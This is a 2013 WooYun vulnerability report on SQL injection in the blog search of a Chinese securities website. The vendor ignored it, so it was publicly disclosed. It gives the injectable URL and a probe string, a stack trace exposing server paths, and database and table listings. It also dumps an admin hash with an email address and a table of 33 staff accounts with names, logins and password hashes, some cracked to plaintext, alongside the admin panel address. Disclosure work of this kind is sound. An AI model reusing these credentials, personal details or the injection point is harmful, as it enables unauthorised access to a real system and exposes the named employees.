中国资本证券网某子站SQL注入可进入后台 | wooyun-2013-035297

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2013-035297

漏洞标题：

中国资本证券网某子站SQL注入可进入后台

漏洞详情

披露状态：

2013-08-26：积极联系厂商并且等待厂商认领中，细节不对外公开
2013-10-10：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

中国资本证券网某子站由于对关键字过滤不严，导致SQL注入。

详细说明：

blog子站的搜索功能未对用户输入进行过滤，从而导致SQL注入。
http://blog.ccstock.cn/search/index?type=blog&keyword=%27

还是个root！

漏洞证明：

1. 爆WEB路径：
直接搜索'

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1#0
 /usr/local/httpd/htdocs/webroot/blog/library1.5x/Zend/Db/Statement.php(283): Zend_Db_Statement_Pdo->_execute(Array)#1 
/usr/local/httpd/htdocs/webroot/blog/library1.5x/Zend/Db/Adapter/Abstract.php(414): Zend_Db_Statement->execute(Array)#2 
/usr/local/httpd/htdocs/webroot/blog/library1.5x/Zend/Db/Adapter/Pdo/Abstract.php(205): Zend_Db_Adapter_Abstract->query('SELECT count(*)...', Array)#3 
/usr/local/httpd/htdocs/webroot/blog/library1.5x/Zend/Db/Adapter/Abstract.php(725): Zend_Db_Adapter_Pdo_Abstract->query('SELECT count(*)...', Array)#4 
/usr/local/httpd/htdocs/webroot/blog/blog/app/models/Search.php(29): 
Zend_Db_Adapter_Abstract->fetchOne('SELECT count(*)...')#5 
/usr/local/httpd/htdocs/webroot/blog/blog/app/modules/default/controllers/SearchController.php(27): Search->fetchBlog(''')#6 
/usr/local/httpd/htdocs/webroot/blog/library1.5x/Zend/Controller/Action.php(502): SearchController->indexAction()#7 
/usr/local/httpd/htdocs/webroot/blog/library1.5x/Zend/Controller/Dispatcher/Standard.php(293): Zend_Controller_Action->dispatch('indexAction')#8 
/usr/local/httpd/htdocs/webroot/blog/library1.5x/Zend/Controller/Front.php(914): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http))#9 
/usr/local/httpd/htdocs/webroot/blog/blog/webroot/bootstrap.php(90): Zend_Controller_Front->dispatch()#10 
/usr/local/httpd/htdocs/webroot/blog/blog/webroot/bootstrap.php(18): Application->dispatch()#11 /usr/local/httpd/htdocs/webroot/blog/blog/webroot/index.php(62): 
Application->__construct(Array)#12 {main}

2. 数据库内容

available databases [14]:
[*] blog
[*] blog_bck
[*] blog_test
[*] good
[*] information_schema
[*] java_cyb_caiji
[*] java_cyb_vpn_caiji
[*] java_pilu_caiji
[*] mysql
[*] phpadsnew
[*] pilu
[*] product
[*] test

Database: blog
[25 tables]
+--------------+
| attachments  |
| blog_move    |
| blogs        |
| blogs_bak    |
| calls        |
| categories   |
| comments     |
| contents     |
| customtxt    |
| friendlink   |
| guestbook    |
| ipban        |
| itemtypes    |
| lastid       |
| logs         |
| mods         |
| modsetting   |
| move_request |
| piccall      |
| setting      |
| spaces       |
| tag_items    |
| tags         |
| trashblogs   |
| users        |
+--------------+
[11:32:21] [INFO] retrieved: 69065
Database: blog
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 69065   |

3. 子站后台管理信息
http://ads.ccstock.cn/admin/index.php
Database: phpadsnew
Table: phpads_config
[1 entry]
+-------+----------------------------------+----------------+
| admin | admin_pw | admin_email |
+-------+----------------------------------+----------------+
| admin | a6cd7fc0a8de6f99d1e735735ac6ca72 | all@ccstock.cn |
+-------+----------------------------------+----------------+
CMD5不给力，解不出来，另一个子站就没这么幸运了。

Database: pilu
Table: cc_admin
[33 entries]
+---------+-------+--------+---------+-------------------------------------------+----------+-------------+-------------+-------------+
| adminId | login | status | remark  | password                                  | nickname | loginName   | update_time | create_time |
+---------+-------+--------+---------+-------------------------------------------+----------+-------------+-------------+-------------+
| 1       | 0     | 0      | admin   | f49c642ddecf21ce76938377b1d9c39a          | admin    | admin       | 0           | 0           |
| 2       | 0     | 1      | <blank> | 96e79218965eb72c92a549dd5a330112 (111111) | mmy83    | mmy83       | 1251564205  | 1251564205  |
| 3       | 0     | 1      | 三审管理    | 06851e82c9bfb1ae3c3946d736bb295b          | 陈杰忠      | 陈杰忠         | 1251966206  | 1251966206  |
| 4       | 0     | 1      | 公告添加编辑  | 21232f297a57a5a743894a0e4a801fc3 (admin)  | 孙雅琴      | 孙雅琴         | 1251967177  | 1251967177  |
| 5       | 0     | 1      | 公告添加编辑  | 21232f297a57a5a743894a0e4a801fc3 (admin)  | 谢静丹      | 谢静丹         | 1251967276  | 1251967276  |
| 6       | 0     | 1      | 二审管理    | 21232f297a57a5a743894a0e4a801fc3 (admin)  | 袁兴梅      | 袁兴梅         | 1251967393  | 1251967393  |
| 7       | 0     | 1      | 一审管理    | 21232f297a57a5a743894a0e4a801fc3 (admin)  | 马岩       | 马岩          | 1251967503  | 1251967503  |
| 8       | 0     | 1      | <blank> | 21232f297a57a5a743894a0e4a801fc3 (admin)  | 蔡志安      | 蔡志安         | 1251968360  | 1251968360  |
| 9       | 0     | 1      | <blank> | 812b38c95bd71c57b7f0082a74289dc9          | sjpan    | sjpan       | 1252309018  | 1252309018  |
| 10      | 0     | 1      | <blank> | 2db7deb4c9f61af7b01dad7700297210          | gyxu     | gyxu        | 1252309067  | 1252309067  |
| 11      | 0     | 1      | <blank> | 849aa647bfcb92d0db7767adcc301df0          | sdcai    | sdcai       | 1252315048  | 1252315048  |
| 12      | 0     | 1      | <blank> | 34ab8fea3ce6b571d3ef5b52389e987c          | 郭海阳      | hyguo       | 1252554766  | 1252554766  |
| 13      | 0     | 1      | <blank> | d61b1a921cd6bc7be23fe34db16c3eec          | 侯创业      | cyhou       | 1252560374  | 1252560374  |
| 14      | 0     | 1      | <blank> | e98b7ed8d32dc432ac5ce7fe53860056          | <blank>  | leo         | 1253242782  | 1253242782  |
| 15      | 0     | 1      | <blank> | f014b94c35268c600ab22ef3e885b54f (csd)    | csd      | csd         | 1254042783  | 1254042783  |
| 16      | 0     | 1      | <blank> | 6b47c8e201106831a794e3484e10795f          | syq      | syq         | 1254042820  | 1254042820  |
| 17      | 0     | 1      | <blank> | 8446909ffea70b46fc7cc194f36e8c63          | psj      | psj         | 1254042840  | 1254042840  |
| 18      | 0     | 1      | <blank> | 481c5fc1f4390c999350647b22347b00          | xjd      | xjd         | 1254042870  | 1254042870  |
| 19      | 0     | 1      | <blank> | 1a192555e46beac31c77b21fcadd9061          | xgy      | xgy         | 1254042895  | 1254042895  |
| 20      | 0     | 1      | <blank> | a0e097d553a77434517a4efd2ae98771          | 袁兴梅      | yxm         | 1254042928  | 1254042928  |
| 21      | 0     | 1      | <blank> | ab127ff4625f98cc88ff0e0f1f911e64          | 董发瑞      | dfr         | 1256116660  | 1256116660  |
| 22      | 0     | 1      | <blank> | b508680bae35614a88cafdb489b17aeb          | 杨晓燕      | yxy         | 1256116691  | 1256116691  |
| 23      | 0     | 1      | <blank> | 92a870e23eaac7b3c576e91b807f2a60 (zc)     | 张楚       | zc          | 1256116715  | 1256116715  |
| 24      | 0     | 1      | <blank> | 9336ebf25087d91c818ee6e9ec29f8c1 (xx)     | 肖旭       | xx          | 1256116733  | 1256116733  |
| 25      | 0     | 1      | <blank> | 960a94ea9a16df253da3bb4f5545eef8          | 蔡晓春      | cxc         | 1257922822  | 1257922822  |
| 26      | 0     | 1      | <blank> | 6cc24e951a1955be867ec0ce9782d8d7          | 蔡晓春      | caixiaochun | 1257922894  | 1257922894  |
| 27      | 0     | 1      | <blank> | c397d7128a5876782f7d088942bb67fe (xuwei)  | 许玮       | xuwei       | 1264666732  | 1264666732  |
| 28      | 0     | 1      | <blank> | 311bcdbdd7b6a8edf118745caf59749a          | 赖勇       | ly          | 1278653448  | 1278653448  |
| 29      | 0     | 1      | <blank> | ff5db99e0bb86a8d682b524674745ec5          | 胡岚峰      | hlf         | 1279182894  | 1279182894  |
| 30      | 0     | 1      | <blank> | a1fa34055727d6dc25f4dbf94d88fe58          | 李静       | lj          | 1290048969  | 1290048969  |
| 31      | 0     | 1      | <blank> | 3e0a9a246401de811a223528ac959a9c          | 王然       | wr          | 1335156068  | 1335156068  |
| 32      | 0     | 0      | <blank> | 23d21dfee9d6f6fd1e3495bfc2869646          | 王浩       | wh          | 1337128630  | 1337128630  |
| 33      | 0     | 0      | <blank> | 88d9bc9b0daf2e5cee5d37a1e060fa55          | 王利利      | wll         | 1343726144  | 1343726144  |
+---------+-------+--------+---------+-------------------------------------------+--------

后台地址可以直接google到。

修复方案：

1. 过滤
2.后台路径保护
3. 密码强度

版权声明：转载请注明来源 springold@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要 关注数(24) 关注此漏洞